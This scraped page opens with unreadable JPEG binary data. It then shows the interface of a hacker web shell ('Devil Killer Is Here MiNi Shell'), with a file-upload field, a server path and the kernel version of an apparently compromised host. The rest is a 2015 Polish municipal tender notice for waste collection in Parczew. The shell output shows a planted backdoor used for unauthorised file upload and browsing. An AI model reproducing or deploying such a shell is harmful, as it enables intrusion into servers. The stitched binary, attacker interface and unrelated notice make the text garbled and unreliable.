JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151125/318608-N-2015.html

<p class="kh_header"><b>Parczew: Odbiór i zagospodarowanie odpadów komunalnych z terenu
gminy Parczew i z PSZOKu
w 2016 roku</b><br>
<b>Numer ogłoszenia: 318608 - 2015; data zamieszczenia: 25.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Parczew , ul. Warszawska 24, 21-200 Parczew, woj. lubelskie, tel. 083 3551237, 3551236.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.parczew.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu
gminy Parczew i z PSZOKu
w 2016 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Parczew w terminie od 1 stycznia do 30 czerwca 2016 roku od właścicieli nieruchomości, na których zamieszkują mieszkańcy oraz z PSZOKu.
2. W ramach zamówienia Wykonawca zobowiązany jest odebrać następujące rodzaje odpadów komunalnych
1/Zmieszane odpady komunalne /szacunkowa ilość 836,5
Mg/. 2/Odpady zebrane selektywnie /szacunkowa
ilość 514,5
Mg/ z podziałem na a/Papier i tekturę, metal, tworzywa sztuczne, opakowania wielomateriałowe,
b/Szkło i odpady opakowaniowe ze szkła, c/Popiół, d/Odpady dostarczone do Punktu Selektywnej Zbiórki Odpadów Komunalnych odpady komunalne ulegające biodegradacji, odpady zielone, przeterminowane leki, chemikalia, zużyte baterie i akumulatory, zużyty
sprzęt elektryczny i elektroniczny, meble i inne odpady wielkogabarytowe, odpady
budowlane i rozbiórkowe, zużyte opony, popiół. 3. Odbioru odpadów wymienionych
w ust. 2 należy przeprowadzać różnymi samochodami dla poszczególnych frakcji odpadów tj. zmieszane odpady komunalne, selektywnie zebrane odpady komunalne, popiół. 4. W ramach zamówienia Wykonawca zobowiązany będzie odbierać odpady komunalne z następującymi częstotliwościami a/ Zabudowa wielorodzinna
/teren miasta/ Niesegregowane
/zmieszane/ odpady komunalne /kod 20 03 01/ zbierane
będą do pojemników dostarczonych przez Wykonawcę o pojemnościach 1100 l i 7000 l ustawionych w miejscach wskazanych przez zarządcę nieruchomości /altanki śmietnikowe, wyznaczone miejsca na pojemniki/. Częstotliwość odbioru przez
Wykonawcę odpadów zmieszanych codziennie w dni robocze w godzinach 7.00 17.00.
Selektywnie zbierane odpady komunalne i opakowaniowe /kody 20 01 01, 20 01 02, 20 01 39, 20 01 40 i 15 01 01,15 01 02, 15 01 03
15 01 04, 15 01 05, 15 01 06, 15 01 07, 15 01 09/. Selektywna zbiórka odpadów komunalnych na terenie zabudowy wielorodzinnej, odbywać się będzie do specjalistycznych pojemników dostarczonych przez Wykonawcę. Częstotliwość odbioru przez Wykonawcę tych odpadów, zależnie od lokalizacji w godzinach 7.00 17.00, pojemniki na szkło 3 razy w tygodniu, pojemniki na papier i tekturę, tworzywa sztuczne, metal i opakowania wielomateriałowe 3
razy w tygodniu b/Zabudowa zagrodowa /teren wiejski/, zmieszane odpady komunalne raz
w miesiącu, selektywnie zebrane odpady komunalne: papier i tektura /w tym opakowania,
gazety, czasopisma, itd./ metal, tworzywa sztuczne, opakowania wielomateriałowe raz
w miesiącu, szkło i odpady opakowaniowe ze szkła raz na kwartał. c/Zabudowa jednorodzinna /teren miasta/, zmieszane odpady komunalne raz na dwa tygodnie, selektywnie
zebrane odpady komunalne, papier i tektura /w tym opakowania, gazety, czasopisma, itd./ metal, tworzywa sztuczne, opakowania wielomateriałowe dwa razy w miesiącu, szkło
i odpady opakowaniowe ze szkła raz na kwartał, popiół raz w miesiącu w okresie 1 październik 30 kwiecień. 5. Wykonawca zobowiązany jest do odbierania odpadów z poszczególnych nieruchomości w ustalonych w harmonogramie usuwania odpadów komunalnych terminach z zastrzeżeniem, że odbiór w/w
odpadów musi odbywać się od poniedziałku do piątku w godzinach 7.00 17.00.
6. Wykonawca zobowiązany jest przygotować /przed podpisaniem umowy/ harmonogram odbioru odpadów komunalnych, zgodny z częstotliwością ich odbioru wymienioną w ust. 4 Wykonawca zobowiązany jest poinformować pisemnie każdego właściciela nieruchomości, na której zamieszkują mieszkańcy o harmonogramie odbioru odpadów komunalnych
oraz o zmianie tego harmonogramu. Pierwszy harmonogram należy dostarczyć mieszkańcom w terminie 7 dni od dnia podpisania umowy. 7. Na terenie gminy Parczew zamieszkuje około 11 500 osób a/ około 4 000 w zabudowie wielorodzinnej b/ około 4 000 w zabudowie jednorodzinnej, c/ około 3 500 w zabudowie zagrodowej.
8. Liczba obsługiwanych nieruchomości: a/ liczba nieruchomości w zabudowie wielorodzinnej 95, b/ liczba nieruchomości do obsługi w zabudowie jednorodzinnej 1579, c/ liczba nieruchomości do obsługi w zabudowie zagrodowej 1026.
9.Wykonawca zobowiązany jest do odbioru odpadów komunalnych gromadzonych na terenie
poszczególnych nieruchomości w pojemnikach o pojemności 120 l, 240 l, 1100 l, 7000 l i innych występujących na terenie gminy, oraz workach 120 l z folii LDPE przeznaczonych na gromadzenie odpadów zebranych w sposób selektywny, 10. Wykonawca zobowiązany jest do wyposażenia w dniu odbioru odpadów właścicieli nieruchomości w zabudowie jednorodzinnej i zagrodowej, od których odbierane są odpady komunalne gromadzone w sposób selektywny w worki w ilości i rodzaju odpowiadającemu wystawionym workom w danym miesiącu, przy czym przed pierwszym odbiorem odpadów komunalnych Wykonawca wyposaży nowe
nieruchomości w 3 worki każdego koloru. Charakterystyka i przewidywana całkowita ilość worków a/ żółte z napisem /Odpady suche/ 45.000 szt. b/ zielone z napisem /Szkło/ 10.000
szt. Charakterystyka worków do selektywnej zbiórki odpadów a/ materiał folia
polietylenowa LDPE, b/ pojemność 120 dm3, c/ kolor żółty, zielony, d/ grubość co najmniej 40 mikronów, e/ nadruk jednostronny, kolor nadruku czarny, treść zostanie przekazana Wykonawcy na 14 dni przed rozpoczęciem realizacji zamówienia. 11. Wykonawca zobowiązany jest dostarczyć /na okres obowiązywania umowy/ następujące rodzaje pojemników a/Na zmieszane odpady komunalne, 7000 litrów 18 sztuk, 1100 litrów 36 sztuk, b/Na selektywnie zebrane odpady komunalne, 7000 litrów, zaopatrzone w specjalne otwory wrzutowe pojemniki koloru żółtego z napisem /Odpady suche/ 10 sztuk, 1100 litrów, zaopatrzone w specjalne otwory wrzutowe pojemniki koloru żółtego z napisem /Odpady suche/ 52
sztuk, 1100 litrów /na szkło/ kolor zielony z napisem /szkło/ 41 sztuk, 120 litrów /na popiół/ kolor czarny 1579 sztuk, 1100 litrów 45 sztuk. Pojemniku zostaną rozstawione przez Wykonawcę w miejscach wskazanych przez Zamawiającego w terminie do 31.12.2015 roku. 12. Wykonawca zobowiązany jest zorganizować dwie zbiórki sprzętu elektrycznego i elektronicznego oraz mebli i innych odpadów wielkogabarytowych z terenu
wszystkich nieruchomości zamieszkałych na terenie gminy Parczew. Termin zbiórki zostanie ustalony przed podpisaniem umowy. 13. Wykonawca zobowiązuje się do przekazywania Zamawiającemu, kart przekazania odpadów do miejsca ich odzysku, recyklingu lub unieszkodliwiania wraz z fakturą za dany miesiąc. Faktura musi dotyczyć tylko odpadów odebranych z gminy Parczew. 14. Wykonawca zobowiązuje się do przekazywania
sprawozdania półrocznego, o którym mowa w art. 9n ust. 1 3 ustawy o utrzymaniu czystości i porządku w gminach, w terminie do ostatniego dnia miesiąca następującego po półroczu, którego dotyczy. Sprawozdanie zawiera 1/ informacje o masie poszczególnych rodzajów odebranych odpadów komunalnych oraz sposobie ich zagospodarowania, wraz ze wskazaniem instalacji, do której zostały przekazane odebrane od właścicieli nieruchomości zmieszane odpady komunalne, odpady zielone oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania 2/ informacje o masie odpadów komunalnych ulegających
biodegradacji a/przekazanych do składowania na składowisku odpadów, b/nieprzekazanych do składowania na składowisku odpadów i sposobie ich zagospodarowania 3/ liczbę właścicieli nieruchomości, od których zostały odebrane odpady komunalne 4/ wskazanie właścicieli nieruchomości, którzy zbierają odpady komunalne w sposób niezgodny z regulaminem utrzymania czystości i porządku na obszarze gminy Parczew. Do takiego wykazu należy dołączyć dokumentację fotograficzną /na elektronicznym nośniku danych/ i notatkę służbową
każdego stwierdzonego przypadku zbierania odpadów komunalnych w sposób niezgodny z regulaminem. 15. W celu weryfikacji danych zawartych w sprawozdaniu, o którym mowa w ust.14, Burmistrz Parczewa, może zobowiązać Wykonawcę odbierającego odpady komunalne od właścicieli nieruchomości do okazania dokumentów sporządzanych na potrzeby ewidencji odpadów oraz dokumentów potwierdzających osiągnięcie określonych poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania. 16.
Odpady zebrane z terenu gminy Wykonawca zobowiązany jest dostarczyć 1/ Zmieszane odpady komunalne, odpady zielone oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do Zakładu Zagospodarowania Odpadów dla Regionu Biała Podlaska Bialskie Wodociągi i Kanalizacja /WODKAN/ Sp. z o.o. w Białej Podlaskiej, ul. Narutowicza 35A, 21 500 Biała Podlaska 2/ Selektywnie zebrane odpady
komunalne do instalacji odzysku i unieszkodliwiania odpadów zgodnie z hierarchią postępowania z odpadami oraz zasadą bliskości, o których mowa w art. 17 i 20 ustawy z dnia 14 grudnia 2012 r., o odpadach /Dz. U. z 2013 r. poz. 21 ze zm./.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-5, 90.51.20.00-9, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 10.000,00 zł (słownie:
dziesięć tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać wpis do Rejestru działalności regulowanej w zakresie
odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez
Burmistrza Parczewa, zezwolenie na prowadzenie działalności w zakresie transportu
odpadów wydane przez właściwy organ oraz spełniać warunki rozporządzenia Ministra
Środowiska z dnia 11 stycznia 2013 r w sprawie szczegółowych wymagań w zakresie
odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U.2013.122)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien posiadać niezbędną wiedzę i doświadczenie poprzez wykonanie,
a w przypadku świadczeń okresowych i ciągłych również wykonywanych w zakresie niezbędnym do wykazania warunku spełnienia wiedzy i doświadczenia w okresie
ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia
działalności jest krótszy, to w tym okresie usług odpowiadających swoim rodzajem
usłudze stanowiącej przedmiot zamówienia. Warunek uznaje się za spełniony, jeśli
wykonawca w ww. okresie wskaże usługi o łącznej wartości nie mniejszej niż 1
000.000,00 zł brutto, podając ich wartość, daty i miejsce wykonania, podmioty, na rzecz
których usługi zostały wykonane wraz z załączeniem dowodów, czy zostały wykonane
należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien posiadać co najmniej dwa pojazdy przystosowane do odbierania
zmieszanych odpadów komunalnych oraz co najmniej dwa pojazdy przystosowane do
odbierania selektywnie zebranych odpadów komunalnych, a także co najmniej jeden
pojazd do odbierania odpadów bez funkcji kompaktującej</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań dla tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań dla tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy z wykorzystaniem wzoru. 2. Dokument potwierdzający posiadanie uprawnień pełnomocnictw
osób podpisujących ofertę, o ile ten fakt nie wynika z przedstawionych dokumentów. Treść
pełnomocnictwa powinna dokładnie określać zakres umocowania</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Posiadanie wiedzy i doświadczenia - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której
dokonano wyboru Wykonawcy, chyba że będą to zmiany wynikające z następujących przesłanek 1) wystąpienia uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez
Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zamawiającego 2) dostosowania umowy do
zmian powszechnie obowiązujących przepisów prawa mających wpływ na realizację przedmiotu zmówienia 3)
wystąpienia siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego
nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego
powstaniem szkody w znacznych rozmiarach 4) z powodu działań osób trzecich uniemożliwiających wykonanie
prac, które to działania nie są konsekwencją winy którejkolwiek ze stron 5) wprowadzenie lub zmiana
podwykonawcy 6) przekształcenie lub zmiana siedziby którejkolwiek ze stron umowy 7) zmiana osób
reprezentujących strony oraz innych osób z nazwiska wymienionych w umowie 8) zajdą inne okoliczności
niezależne od Wykonawcy, których nie można było przewidzieć w dniu zawarcia umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.parczew.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Parczewie
ul. Warszawska 24
21-200 Parczew
pokój Nr 19 /II piętro/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2015 godzina 10:00, miejsce: Urząd Miejski w Parczewie
ul. Warszawska 24
21-200 Parczew
